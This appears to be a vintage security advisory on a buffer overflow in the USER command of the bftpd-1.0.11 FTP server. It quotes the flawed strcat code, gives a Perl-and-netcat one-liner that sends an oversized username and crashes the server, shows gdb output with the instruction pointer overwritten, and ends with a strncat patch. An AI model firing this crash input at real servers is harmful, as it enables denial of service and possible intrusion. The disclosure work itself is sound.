COMMAND

    bftpd

SYSTEMS AFFECTED

    bftpd-1.0.11

PROBLEM

    Christophe Bailleus found following.  bftpd is a Linux FTP  server
    with chroot and setreuid.  Not all FTP commands are included.   It
    accesses either the user's home directory or its ftp subdirectory,
    and user authentication is via passwd/shadow or PAM.

    The lastest version of bftp has a potential security problem  when
    entering the USER  command.  The  problem is a  potential Overflow
    Vulnerability when entering more 35 characteres in USER command.

    a) Code problem (bftpd-1.0.11/commands.c):

        102  void command_user(char *username) {
        103    char *alias;
        104    char name[USERLEN + 7] = "ALIAS_";
        105    if(state) {
        106      fprintf(stderr, "503 Username already given.\r\n");
        107      return;
        108    }
        109    alias = (char *) config_getoption(strcat(name, username));
        110    if(alias[0] != '\0')

    b) Demo / gdb output

        tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21
        
        
        tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain
        conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for
        details.
        This GDB was configured as "i386-slackware-linux"...
        (no debugging symbols found)...
        Attaching to program: /usr/sbin/bftpd, Pid 6624
        Reading symbols from /lib/libcrypt.so.1...done.
        Loaded symbols for /lib/libcrypt.so.1
        Reading symbols from /lib/libc.so.6...done.
        Loaded symbols for /lib/libc.so.6
        Reading symbols from /lib/ld-linux.so.2...done.
        Loaded symbols for /lib/ld-linux.so.2
        0x400e7514 in read () from /lib/libc.so.6
        (gdb) c
        Continuing.
        
        Program received signal SIGSEGV, Segmentation fault.
        0x41414141 in ?? ()
        (gdb)
        (gdb) x $esp
        0xbffffcb8:     0x41414141
        (gdb)

    It's  not  possible  to  exploit  it  with  a  standart exploit...
    commands.c contains a piece of code filtering non-writable  chars,
    eg : NOP, shellcode...

        469    for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer garbage  */
        470      if(str[i] < 32) {
        471        memmove((char *) ((int) str + i),
        472                (char *) ((int) str + i + 1),
        473                strlen(str) - i);
        474        i--; /* If junk is found, don't increment counter in next loop. */
        475      }
        476    }

SOLUTION

    In bftpd-1.0.11/commands.c modify the line 109

        alias = (char *) config_getoption(strcat(name, username));

    by

        alias = (char *) config_getoption(strncat(name, username, USERLEN));

    bftpd team has been informed.